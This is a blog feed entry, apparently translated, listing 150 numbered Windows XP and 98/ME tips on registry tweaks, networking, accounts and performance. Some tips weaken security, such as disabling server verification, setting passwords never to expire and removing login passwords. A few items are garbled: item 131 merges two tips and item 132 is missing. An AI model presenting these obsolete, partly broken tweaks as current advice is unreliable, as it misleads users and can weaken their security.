Add an exception to the security settings in Internet Explorer so that updating through the Windows Update page goes smoothly. Open Internet Options from the Tools menu in Internet Explorer. Click the Security tab, select Trusted Sites and click the Sites button. Enter the Windows Update site name, untick the option Require server verification… and click OK.&lt;br /&gt;16. If you lose your Windows XP serial number, use the freeware Magical Jelly Bean Keyfinder from http://www.magicaljellybean.com/keyfinder.shtml.&lt;br /&gt;17. If the name registered in your Windows XP is wrong, fix it through the registry. Open the registry and select My Computer. Click Edit|Find and type RegOwner. Once it is found, right-click it, choose Modify and enter the correct name. The same change can be made to the RegCompany key.&lt;br /&gt;Improving Internet and Network Performance&lt;br /&gt;18. To share a folder on your computer over the network, right-click the folder and choose Properties. Click the Sharing tab and enable the option Share this folder on the network. Give it a name and click OK.&lt;br /&gt;19. Create a My Network Places icon on the desktop by right-clicking an empty area of the desktop and clicking Properties. Select the Desktop tab|Customize Desktop. Then open the General tab and enable the option My Network Places.&lt;br /&gt;20. There is an easy way to send a message to another computer on the network: Console Message. Open Control Panel|Administrative Tools|Computer Management|Action|All Task|Send Console Message. Type the text you want to send, add the name of the destination computer and click Send.&lt;br /&gt;21. To configure the Internet Connection Firewall (ICF), open Network Connections in Control Panel, right-click the connection and click Properties. Open the Advanced tab and enable the option Protect my computer and network by limiting or preventing access to this computer from the Internet.&lt;br /&gt;22. 
Configure the Internet Connection Firewall (ICF) for every connection you have, whether dial-up or broadband. If your computer is part of a network connected to the Internet, enable ICF only on the server computer.&lt;br /&gt;23. To find your IP address, open a DOS prompt by typing command in Run. Then type ipconfig /all.&lt;br /&gt;24. If you receive messages from the Internet through Messenger, turn it off at once. Go to Control Panel|Administrative Tools|Services, double-click Messenger and click Stop. To keep it from happening again, set Messenger to Disabled under Startup.&lt;br /&gt;25. Disable Windows Messenger through regedit. Open HKEY_LOCAL_MACHINE\Software\Policies\Microsoft, then choose Edit|New|Key and name it Messenger. Create another key the same way inside the Messenger key and name it Client. After that, choose Edit|New|DWORD Value and name it PreventRun. Right-click the PreventRun value, choose Modify, enter 1 in Value data and click OK.&lt;br /&gt;26. To get information about the connections on your computer, click Start|All Programs|Accessories|System Tools|System Information. Choose Tools|Net Diagnostics. In the window that opens, select the option Scan your system. Wait for the process to finish to see the results.&lt;br /&gt;27. Protect your privacy by preventing Windows Media Player from sending data about your computer and your usage habits over the Internet to certain addresses. It's easy: in Windows Media Player, choose Tools|Options. Open the Player tab and disable the option Allow Internet sites to uniquely identify your player.&lt;br /&gt;28. To lock a computer that is in a network domain, press Ctrl + Alt + Del together and click the Lock Computer option. To unlock it, press Ctrl + Alt + Del and enter the password.&lt;br /&gt;Easy and Fast Windows Configuration&lt;br /&gt;29. 
To disable the autorun feature, right-click the CD drive icon, choose Properties and open the AutoPlay tab. Then disable autoplay for each file type shown in the list.&lt;br /&gt;30. Use Microsoft's Clear Type Tuning Control from http://www.microsoft.com/typography/cleartype/ to adjust Clear Type on your computer.&lt;br /&gt;31. To see the system files that Windows XP hides by default, select the View tab under Tools|Folder Options in Windows Explorer. Enable Display the contents of system folders.&lt;br /&gt;32. To put the volume control icon in the taskbar, go to Control Panel|Sound and Audio and click the Volume tab. Enable Place volume control in the Taskbar and click OK.&lt;br /&gt;33. Configure the Power button on the keyboard through Control Panel|Power Options on the Advanced tab. Set its behaviour by choosing one of the available options.&lt;br /&gt;34. For security, set Windows to clear the pagefile at shutdown. Open the registry and go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management. Change the value of ClearPageFileAtShutdown to 1. As a consequence, shutdown will take slightly longer.&lt;br /&gt;35. Set Windows to show the extension of every file. In Windows Explorer, choose Tools|Folder Options and the View tab. Untick the option Hide file extensions for known file types.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;36. Removing Installed Components&lt;br /&gt;Many Windows components do not appear in Add/Remove Windows Component and so cannot be uninstalled.&lt;br /&gt;1. Open Notepad and choose File|Open. Browse to the Windows\inf folder. Enter the file name sysoc.inf. Click Open to open the file.&lt;br /&gt;2. Choose Edit|Replace. Type Hide in the Find field, leave the Replace With field empty, and click Replace All. The aim is to delete every occurrence of the word Hide in this file. 
When done, save and close the file.&lt;br /&gt;3. Open Control Panel and choose Add/Remove Programs. Then choose Add/Remove Windows Component; the window that appears will show several components that were previously hidden.&lt;br /&gt;37. Change the picture on the welcome screen by going to User Accounts in Control Panel. Open your account and click Change my picture. Pick an image by clicking Browse for a picture on the hard disk, or choose one of the pictures provided.&lt;br /&gt;38. If you prefer the old-style Start Menu, you can switch by right-clicking the Start button and choosing Properties. Select Classic Start Menu and click Customize to arrange its contents.&lt;br /&gt;39. To complete the classic look of the Start Menu, right-click the desktop and choose Properties. Open the Themes tab and select Windows Classic from the Theme list.&lt;br /&gt;40. Add an image to a folder so that the image is shown when Windows Explorer is in thumbnails view. Right-click the folder you want to change and choose Properties. Click the Customize tab and click Choose Picture. Select a picture and click Open|OK.&lt;br /&gt;41. Adjust the Recycle Bin capacity by right-clicking the Recycle Bin icon and choosing Properties. Enter the capacity you want and click OK.&lt;br /&gt;42. When View is set to Details in Windows Explorer, right-click any column header to choose which columns are shown. Click More if you need to adjust other settings.&lt;br /&gt;43. To add the programs you use most often to Quick Launch, drag the program's icon onto Quick Launch.&lt;br /&gt;44. Add an address bar to the taskbar for faster access to Internet addresses. Right-click the taskbar and choose Toolbars|Address. Double-click it to open and close it.&lt;br /&gt;45. Make Windows Explorer look like the My Computer window. 
To do so, right-click the Windows Explorer icon and choose Properties. In the Target field, after %SystemRoot%\explorer.exe add /n, /e, /select, C:\ and click OK.&lt;br /&gt;46. To add a program shortcut to the top of the Start Menu, right-click its icon in the Start Menu and click Pin to Start Menu.&lt;br /&gt;47. To make a drive or folder appear in the Send To menu, drag its shortcut to the folder \Documents and Settings\\SendTo.&lt;br /&gt;48. Looking for the SendTo folder? Just click Start|Run, type SendTo and click OK.&lt;br /&gt;49. To clear the list of documents in My Recent Documents on the Start Menu, right-click Start and choose Properties. Click Customize, open the Advanced tab and click the Clear list button. To stop anything further appearing in My Recent Documents, disable the option List my most recently opened documents.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;50. Fast User Switching: With Fast User Switching, one user does not need to log off while another user logs in.&lt;br /&gt;1. To enable Fast User Switching, open Control Panel and choose User Accounts. Click the option Change the way users log on or off and enable Use Fast User Switching.&lt;br /&gt;2. To keep a dial-up connection running while Fast User Switching is enabled, open the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.&lt;br /&gt;3. Right-click in the right-hand pane and choose New|String Value. Name it KeepRasConnections and give it the value 1. Restart the computer.&lt;br /&gt;51. To see the actual contents of the My Recent Documents folder, click Start|Run and type %UserProfile%\Recent.&lt;br /&gt;Multiple User Settings&lt;br /&gt;52. To switch between user accounts, press Ctrl+Alt+Del, then in the Task Manager window that opens select the Users tab. Right-click the name of the user you want to use and click Connect.&lt;br /&gt;53. Add a Guest account so that other people can use your computer. 
To do so, open User Accounts in Control Panel and click Guest|Turn On the Guest Account.&lt;br /&gt;54. Remember always to log in as System Administrator before making changes that affect the computer's performance.&lt;br /&gt;55. To copy a user profile, open Control Panel|System. Go to the Advanced tab and click the Settings button under User Profiles. Highlight the profile you want to copy, then click Copy To and choose where to store the profile. To change permissions, click the Change button.&lt;br /&gt;56. Replace the Welcome screen with the login dialog for added security. Open User Accounts in Control Panel, choose the option Change the way users log on or off and disable the Welcome screen.&lt;br /&gt;57. Use the Shared Documents folder to store files that other people on the network can open. The folder can be found in the Other Places area of My Documents.&lt;br /&gt;58. In Windows XP Pro Edition, a password can expire if it has not been used to log in for a long time. To avoid this, set Windows not to do so. Click Start|Run, type userpasswords2 and press Enter. Open the Advanced tab and, under Advanced user management, click the Advanced button and select Local Users and Groups. Right-click the user name and choose Properties. Open the General tab and enable the option Password never expires.&lt;br /&gt;59. Give each partition or drive a different name. This matters because it makes finding files easier.&lt;br /&gt;60. Create a password reset disk as an emergency diskette for when you lose your password. Open Control Panel and open User Accounts. Select your account and choose Prevent a forgotten password to start the wizard.&lt;br /&gt;File and Folder Settings&lt;br /&gt;61. Create a compressed folder by right-clicking an empty area of the desktop and choosing New|Compressed (zipped) Folder. Name it and drag and drop the files you want to compress into the folder.&lt;br /&gt;62. 
A compressed folder can be protected with a password. Open the File|Add a Password menu. Enter your password and enter it again to confirm.&lt;br /&gt;63. You can still add to a compressed folder by dragging and dropping the files you want to compress into it.&lt;br /&gt;64. When running Disk Cleanup, select the option Compress old files to compress files that are no longer needed, saving hard disk space.&lt;br /&gt;65. Encrypting (scrambling) files can be done in Windows XP Pro Edition by right-clicking My Computer and choosing Properties. Open the General tab and click Advanced. Enable the option Encrypt contents to secure data.&lt;br /&gt;66. The easiest way to rename a file or folder is to select it and press F2.&lt;br /&gt;67. So that you can move between folders quickly, especially those you open often, create a shortcut for each frequently accessed folder.&lt;br /&gt;68. Reset a file association by holding the Shift key while right-clicking a file. Choose Open With… Select the program you want to use to open the file and enable the option Always use the selected program to open this kind of file. Then click OK.&lt;br /&gt;69. Adjust the storage size of music files by opening Windows Media Player and choosing Tools|Options. Open the Copy Music tab and adjust the size by moving the slider.&lt;br /&gt;70. If you keep all your documents in the My Documents folder, those files are easier to back up and are not affected by System Restore.&lt;br /&gt;71. If a file copied from a CD cannot be accessed, remove its Read-only attribute. Right-click the file and choose Properties. Clear the check mark on the Read-only option.&lt;br /&gt;72. Set the appearance of each folder by right-clicking the folder in My Computer. Choose Properties and click Customize. 
Pick one of the available templates or choose a picture you like. Click OK to save the settings.&lt;br /&gt;73. You can rename several files of the same kind in the same folder at once, for example a collection of photos or images. Select all the files you want to rename, right-click the first file and click Rename. Give it a name, for example Koleksi.JPG, and all the other files will be renamed Koleksi (1).JPG, Koleksi (2).JPG, and so on.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;74. Sending Faxes: Did you know that Windows XP has a tool for sending and receiving faxes?&lt;br /&gt;1. Open Control Panel, choose Add/Remove Programs and click Add/Remove Windows Components. Enable Fax Services and click Next.&lt;br /&gt;2. Click Start|All Programs|Accessories|Communications|Fax|Fax Console to run the Fax Configuration Wizard. Configure all the settings, including the fax number and modem to use and the handling of incoming faxes.&lt;br /&gt;3. Create all faxes from the Fax Console. Check the whole content before sending, including settings and so on.&lt;br /&gt;Setting Print Quality&lt;br /&gt;75. You can print several photos at once and set the layout and other options easily. First, open the photo files in the My Pictures folder, then choose File|Print. The Photo Printing Wizard appears. Select the printer and the layout to use. Some printers can print several photos on one sheet of paper.&lt;br /&gt;76. Rather than adjusting the printer settings every time you use it, make copies of your printer. Configure each one with the different options you need.&lt;br /&gt;77. You can use characters that are not on the keyboard but are available in Windows through Character Map. You can find it at Start|All Programs|Accessories|System Tools|Character Map, or type “charmap” without the quotation marks in Start|Run.&lt;br /&gt;78. 
To capture a scene from a movie file as an image, play the movie and press Stop at the scene you want. Click Take Picture, save it in your folder and give it a name.&lt;br /&gt;Revealing Hidden Features&lt;br /&gt;79. Interested in the original Windows opening music? Find the file at \windows\system32\oobe\images\title.wma.&lt;br /&gt;80. Two editions of Windows Plus! are in circulation: Microsoft Plus! for Windows and Digital Media Edition (DME). See www.microsoft.com/windows/plus/PlusHome.asp and try the trial version of DME.&lt;br /&gt;81. Type “iexpress” without the quotation marks in the Start|Run dialog. You will find a utility for compressing files and building self-extracting files.&lt;br /&gt;82. There are several tools that are less well known but remarkably capable. They can be found in the support\tools folder on the Windows XP installation CD. Use suptools.msi to install them on your computer.&lt;br /&gt;83. Windows has many wizards, or step-by-step guides. To find out which, open Help and Support and type “Wizard” without the quotation marks in the search field. Windows will list the available wizards; just pick one.&lt;br /&gt;84. To create your own character, click Start|Run and type Eudcedit. Design it as you like, as long as it stays within the 64x64 grid. Save it by choosing Edit|Save Character.&lt;br /&gt;85. To put a character from Character Map into a document, simply open Character Map and select the character. Then copy and paste it into your document.&lt;br /&gt;Decorating the Desktop&lt;br /&gt;86. You can set the mouse pointer to your liking by opening the Pointers tab under Mouse in Control Panel. Click Browse to find a pointer you like.&lt;br /&gt;87. 
To show the list of recently accessed documents on the Start Menu in Windows XP Home Edition, right-click the Start button and choose Properties. Click Customize, open the Advanced tab and enable the option List my most recently opened documents.&lt;br /&gt;88. If you want the Windows Explorer window to open full screen and cover the taskbar, press F11.&lt;br /&gt;89. You can create a shortcut key, a key press that launches a program. Right-click the program's icon and choose Properties. Open the Shortcut tab and choose the key you will use to launch the program. Windows automatically adds Ctrl+Alt+ to your chosen key as the shortcut key.&lt;br /&gt;90. Sort all the programs in the Start Menu alphabetically to make them easier to reach. Click Start|All Programs, right-click one of the programs and choose Sort by Name.&lt;br /&gt;91. Show the broadband or dial-up connection indicator icon in the system tray for easier monitoring. Open My Network Places, choose View Network Connections, right-click the connection you use and choose Properties. Enable the option Show icon in notification area when connected.&lt;br /&gt;92. You can edit the Start Menu to suit your needs: add to it, remove from it, or even rename entries. Right-click Start and choose Open or Open All Users. Arrange each shortcut as needed.&lt;br /&gt;93. You can open several programs at once by holding the Shift key while clicking programs in the Start Menu.&lt;br /&gt;94. To remove the name of a desktop icon, right-click the icon and choose Rename. Hold the Alt key and type 255 on the numeric keypad. Then press Enter.&lt;br /&gt;95. You can remove the arrow on shortcut icons on the desktop. 
To do so, open the registry editor by typing “regedit” without the quotation marks in the Start|Run dialog. Go to HKEY_CLASSES_ROOT\Lnkfile. Delete the value IsShortcut.&lt;br /&gt;--&gt; TOP TIPS !&lt;br /&gt;96. List of Shortcuts: Below are some of the shortcuts used most often in everyday work with Windows.&lt;br /&gt;[Windows] + [L] Lock the computer&lt;br /&gt;[Windows] + [U] Show Utility Manager&lt;br /&gt;[Windows] + [R] Show Run&lt;br /&gt;[Windows] + [F] Show the search window&lt;br /&gt;[Windows] + [E] Open My Computer&lt;br /&gt;[Windows] + [D] Toggle the desktop on or off&lt;br /&gt;[Windows] + [M] Minimize all windows&lt;br /&gt;[Windows] + [Shift] + [M] Restore all minimized windows&lt;br /&gt;[Windows] + [Ctrl] + [F] Search for computers on the network&lt;br /&gt;[Windows] + [F1] Show the Help page&lt;br /&gt;[Windows] + [Break] Show the System Properties window&lt;br /&gt;[Windows] + [Tab] Cycle through the taskbar buttons&lt;br /&gt;If you use an old keyboard that has no Windows key, use the Ctrl + Esc key combination.&lt;br /&gt;97. You can enable or disable grouping of several files from one program. Right-click the taskbar and choose Properties. Set or clear the check mark on the option Group similar taskbar buttons.&lt;br /&gt;98. You can hide or show the icons on the desktop by right-clicking the desktop and choosing Arrange Icons By|Show Desktop Icons.&lt;br /&gt;99. You can create a custom toolbar by right-clicking the taskbar and choosing Toolbars|New Toolbar. Set it up as you like, for example making My Documents a toolbar on the taskbar for quick and easy access.&lt;br /&gt;100. Right-click the Start Menu and choose Properties; if you are not using the Classic Start Menu, click Customize and open the Advanced tab. Several menus can be enabled by ticking the available options, from Scroll Programs to showing various features in the Start Menu.&lt;br /&gt;101. 
You can open a website without opening the browser first. Type the full address of the site in the Start|Run dialog, for example www.pcmedia.co.id, then press Enter.&lt;br /&gt;102. Every menu in Windows has an underlined letter as a guide for keyboard navigation. For example, the File menu can be opened by pressing Alt+F. You can turn this underlining on or off. Right-click an empty area of the desktop. Then open the Appearance tab and click the Effects button. Set the check mark on the option Hide underlined letters for keyboard navigation until I press the [Alt] key.&lt;br /&gt;103. Make the computer sound a warning when Caps Lock, Num Lock or Scroll Lock is switched on. Open Control Panel and go to Accessibility Options. Open the Keyboard tab and enable the option Use ToggleKeys.&lt;br /&gt;104. To get Hibernate in Windows XP when you press Turn Off in the Start Menu, hold down the Shift key. The Stand By button in the Shut Down dialog then changes to Hibernate.&lt;br /&gt;105. If your hardware supports Hibernate, enable the feature right away. Open Control Panel and open Power Options. Click the Hibernate tab and tick the option Enable Hibernate. If your hardware does not support Hibernate, this tab will not be there.&lt;br /&gt;Improving Computer Performance&lt;br /&gt;106. Speed up your computer by turning off effects that look good but take time, namely animations. Open Control Panel and double-click System. Click the Advanced tab and press the Performance Settings button. Then enable the option Adjust for best performance.&lt;br /&gt;107. To shorten a long boot time, set the BIOS to boot from the hard disk first, with the CD or floppy drive as the next choices.&lt;br /&gt;108. 
Set Windows to load only the programs it needs at startup so that loading is faster and the computer's workload lighter. Type “msconfig” without the quotation marks in the Run dialog and press Enter. On the General tab choose Selective Startup, then open the Startup tab and disable every program that is not needed.&lt;br /&gt;109. You can monitor processor usage by pressing Ctrl+Alt+Del to open Task Manager. Then minimize the window and you will see a graph of processor usage in the system tray.&lt;br /&gt;110. To increase the speed of saving data to a USB ZIP drive, open My Computer and right-click the ZIP drive. Choose Properties, open the Hardware tab and click Properties, then open the Policies tab and enable the option Optimize for Performance.&lt;br /&gt;111. To speed up the Start Menu display, open Registry Editor (type “regedit” without the quotation marks in the Run dialog). Go to HKEY_CURRENT_USER\Control Panel\Desktop. Double-click the value named MenuShowDelay and change the number to 100. This shortens the delay before the Start Menu is displayed.&lt;br /&gt;112. There is a quick way to shut down the computer. Press Ctrl+Alt+Del; in the Task Manager window that appears, open the Shut Down menu and hold the Ctrl key while clicking Turn Off. Make sure all documents have been saved first.&lt;br /&gt;113. You can view graphs showing the computer's performance by several indicators, such as processor usage, memory, and so on. Open Control Panel and double-click Administrative Tools. Open Performance.&lt;br /&gt;114. You can also add other indicators to the Performance tool (in number 13) by clicking the + icon and choosing which new indicators to display.&lt;br /&gt;115. You can merge a registry file, or .reg file, into your Windows registry by double-clicking it. 
To find out what it does, open it with Notepad.&lt;br /&gt;116. If you have 512 MB of RAM, set Windows not to page to disk so that performance improves. Open Registry Editor and go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management. Change the value DisablePagingExecutive to 1.&lt;br /&gt;117. Use Bootcfg.exe to edit Windows XP's boot.ini. Type “cmd” without the quotation marks in the Run dialog to get a DOS prompt, and type bootcfg /? at the prompt for information about the program's features.&lt;br /&gt;118. To choose the operating system used on a computer with multiple drive partitions, open Control Panel, go to System and open the Advanced tab. Click the Startup and Recovery Settings button, then Edit.&lt;br /&gt;119. Use the classic chkdsk utility to scan the hard disk and repair any errors found. Click Start|Run and type “chkdsk c:/f” without the quotation marks to scan and repair drive C. To learn more about chkdsk's features, type “chkdsk /?”.&lt;br /&gt;120. You can skip the Scanner and Camera Wizard when connecting a digital camera. To access it, use Windows Explorer or My Computer. Your digital camera will appear as a drive.&lt;br /&gt;121. Windows XP Pro Edition has a rarely used utility, gpedit. Run it by typing “gpedit.msc” without the quotation marks in the Run dialog and pressing Enter. It can be used for every tool and component in Windows. Try the settings you want one by one and observe the results.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;122. Scheduling Maintenance: Rather than laboriously cleaning up junk in Windows, have Windows clean itself periodically with Scheduled Tasks.&lt;br /&gt;1. 
To schedule Windows maintenance periodically, open Control Panel and double-click Scheduled Tasks. Add a Scheduled Task through the wizard. Click Next to reach the list of programs that can be scheduled.&lt;br /&gt;2. If the tool you want to schedule is not in the list, click Browse and go to the folder where the tool is located. Most Windows tools are in the Windows\system32 folder. Select one and click Open.&lt;br /&gt;3. Type a name for the task and set how often the program should run. Click Next, adjust any other settings needed and enter a username and password to secure the Scheduled Task.&lt;br /&gt;123. Use the free and very useful PowerToys utilities from www.microsoft.com/windowsxp/home/downloads/powertoys.asp. PowerToys consists of several programs, including Open Command Window Here, Alt-Tab Replacement, Tweak UI, Power Calculator, Image Resizer, CD Slide Show Generator, Virtual Desktop Manager, Taskbar Magnifier, HTML Slide Show Wizard, and Webcam Timershot.&lt;br /&gt;124. Windows can gain some speed if the Indexing Service is disabled. It is easy: open Administrative Tools in Control Panel, choose Services and disable Indexing Service.&lt;br /&gt;125. Free up hard disk capacity with Disk Cleanup. Open My Computer, right-click the drive and choose Properties. Open the General tab and click the Disk Cleanup button. Clean out all the junk files, including emptying the Recycle Bin of all data that is no longer used.&lt;br /&gt;126. Remove all shortcuts from the Startup folder in the Start Menu, because programs with a shortcut in this folder are executed automatically when Windows first starts.&lt;br /&gt;127. Check the settings of the messengers on your computer, because nearly every messenger loads itself automatically each time Windows starts. 
Make sure the Automatically Login or Load at Windows Start option is not active.&lt;br /&gt;128. You can launch any program directly by typing its program name in the Run dialog, for example calc for the calculator, winword for Microsoft Word, and so on.&lt;br /&gt;Simple Troubleshooting&lt;br /&gt;129. If the computer suddenly stops during a defrag, restart and enter Safe Mode by pressing F8 just before Windows starts. Defragment your hard disk again from this mode.&lt;br /&gt;130. Find out whether your drive is FAT or NTFS by right-clicking the drive, choosing Properties and opening the General tab. Read the file system details in the dialog that appears.&lt;br /&gt;131. Convert a FAT drive to NTFS from DOS with the command convert c:/FS:NTFS. Open the registry editor, go to HKEY_USERS\.DEFAULT\Control Panel\Desktop and create the value AutoEndTasks with the value 1.&lt;br /&gt;133. If the computer hangs while installing a new driver, restore the computer to its previous configuration. Restart the computer, press F8 to enter Safe Mode and choose the Last Known Good Configuration option.&lt;br /&gt;134. Use Event Viewer to track down applications that fail. Right-click My Computer, choose Manage and click Event Viewer. Double-click each application or system entry that shows an error to see the error information.&lt;br /&gt;135. There is a most reliable way to keep the computer's clock accurate. Double-click the clock at the bottom right of the screen, in the system tray, and select the Internet Time tab. Enable the option Automatically synchronize with an Internet time server. Choose one of the available servers and click Update Now!&lt;br /&gt;Special Tips and Tricks for Windows 98 and ME&lt;br /&gt;136. Back up dial-up settings by dragging and dropping the connection file from the Dial-Up Networking folder to a floppy drive. The backup file is saved with the .dun extension.&lt;br /&gt;137. 
For a quick restart, choose Start|Shut Down|Restart and hold the Shift key while clicking OK.&lt;br /&gt;138. Use the Tweak UI made for Windows 98 from www.microsoft.com/ntworkstation/downloads/powertoys/networking/nttweakui.asp. After installation, open Tweak UI from Control Panel.&lt;br /&gt;139. Use the F3 key to open Find while in Windows Explorer or on the desktop.&lt;br /&gt;140. Manage dial-up connections with Telephony Location Manager, which helps you optimize a dial-up connection. Click Start|Run and type “tlocmgr” without the quotation marks.&lt;br /&gt;141. If your computer cannot be put into standby or suspend mode, fix it with Pmtshoot from http://support.microsoft.com/?kbid=185949.&lt;br /&gt;142. Always back up the registry before changing it. Use Registry Checker, which can be found at Start|Programs|Accessories|System Tools|Tools.&lt;br /&gt;143. Create a bootable diskette for Windows 98 by formatting it with system files. Then copy c:\windows\command\scanreg.exe and c:\windows\himem.sys to the diskette. Do not forget to edit the config.sys file on the diskette, adding the line “device =a:\himem.sys” without the quotation marks.&lt;br /&gt;144. To restore the registry when the computer will not start, try booting from the boot disk. Then go to drive C:\ and type “scanreg /restore” without the quotation marks. Follow the steps to the end, then exit DOS.&lt;br /&gt;145. Add a Control Panel shortcut to the Start Menu by right-clicking the Start button and clicking Open. Then right-click an empty area and choose New|Folder. Enter “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” without the quotation marks and press Enter.&lt;br /&gt;146. You can remove the password dialog that appears before you first enter Windows. 
To do so, open Control Panel, open Passwords and open the Change Passwords tab. Fill in the old password field with your current password and leave the new password field empty. After that, click the User Profiles tab and enable the option All users of this PC use the same preferences and desktop settings. The change takes effect after Windows is restarted.&lt;br /&gt;147. To cancel a print job, open the Printer icon in the system tray by double-clicking it. Then highlight the file being printed in the Printer window, right-click it and choose Cancel.&lt;br /&gt;148. Find DOS-based tools that are still worth using in the tools\MSDOS folder on the Windows 98 installation CD.&lt;br /&gt;149. If Windows 98 or Me runs slowly, check the memory. Right-click My Computer and choose Properties. Open the Performance tab and look at System Resources. If it reaches 80 percent, restart the computer. Remember to close all programs before looking at System Resources.&lt;br /&gt;150. Use Sysedit to edit system files such as Autoexec.bat. 
Type “sysedit” in the Run dialog, without the quotation marks.</content><link rel='related' href='http://defidz.tblog.com' title='150 tips dan trik dasar Windows'/><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7315007311994683873/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7315007311994683873' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7315007311994683873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7315007311994683873'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/150-tips-dan-trik-dasar-windows-setelah.html' title='150 tips dan trik dasar Windows'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>1</thr:total></entry></feed>
